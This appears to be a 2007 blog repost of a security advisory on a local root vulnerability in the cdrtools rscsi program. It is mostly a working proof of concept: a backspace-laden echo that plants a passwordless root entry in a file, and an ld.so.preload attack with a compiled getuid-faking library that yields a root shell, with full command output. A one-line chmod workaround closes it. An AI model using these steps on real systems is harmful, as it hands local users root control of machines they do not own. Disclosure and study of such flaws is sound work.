Wednesday, November 14, 2007 at 12:01 PM |  
Vulnerable Systems:
* cdrtools version 2.x and below

Immune Systems:
* cdrtools version 2.01a18

A vulnerability in cdrtools allows local attackers to overwrite files, one side effect of the overwriting process is that the file's permissions becomes writable by the user calling the rscsi program. This can allow a non-root user to take local root on the machine that has cdrtools installed.

Initial attempts to exploit this issue failed for an unknown reason... this however this is still a valid method of attack. We make use of the first argument passed to rscsi in order to choose the file we wish to write to.

Due to the output from rscsi we make use of 0x08 in order to delete some of the characters that otherwise would be written. This attack method relies on placing a line of text at the end of a file. Please note that 2 other lines of garbage will be placed in the file that may cause other issues.

Proff of Concept:
elguapo@gentoo elguapo $ echo C`echo -e "\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08r00t::0:0:root:/:/bin/bash\x0a"` | /opt/schily/sbin/rscsi /tmp/lala
Segmentation fault (this segfault is not related to the security issue)

elguapo@gentoo elguapo $ cat /tmp/lala
rscsid: user id 1000, name elguapo
rmt: stdin is a PIPE
r00t::0:0:root:/root:/bin/bash

When attempting to echo this line to the password file we get the following error (Note that the password file is overwritten at this point):


E0
Illegal user id for RSCSI server
0

elguapo@gentoo elguapo $ cat /etc/passwd
rscsid: Illegal user '(NULL POINTER)' id 1000 for RSCSI server
rscsid:>E 0 (Illegal user id for RSCSI server) []

We do however have another exploitation option, such as the one listed below:

[kf@vegeta kf]$ ls -al /etc/ld.so.preload
ls: /etc/ld.so.preload: No such file or directory

[kf@vegeta kf]$ cat > oops.c
int getuid(void)
{
return(0);
}

[kf@vegeta kf]$ gcc -c -o oops.o oops.c
[kf@vegeta kf]$ ld -shared -o oops.so oops.o
[kf@vegeta kf]$ ls -al oops.so
-rwxrwxr-x 1 kf kf 1714 Jul 30 18:53 oops.so

[kf@vegeta kf]$ echo duh_kf | /opt/schily/sbin/rscsi /etc/ld.so.preload
E0
Garbage command
0


Note that we now have write permissions to /etc/ld.so.preload
-rw-rw-r-- 1 root kf 1 Jul 30 19:29 /etc/ld.so.preload

So to gain elevated privileges all we need to do is:
[kf@vegeta kf]$ echo /home/kf/oops.so > /etc/ld.so.preload
[kf@vegeta kf]$ su
[root@vegeta kf]# rm /etc/ld.so.preload
rm: remove regular file `/etc/ld.so.preload'? y
[root@vegeta kf]# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

Workaround:
chmod -s /opt/schily/sbin/rscsi
Posted by admin Labels:

0 comments:

Visit the Site
Privacy Statement
Copyright 2007, pirate-unsecure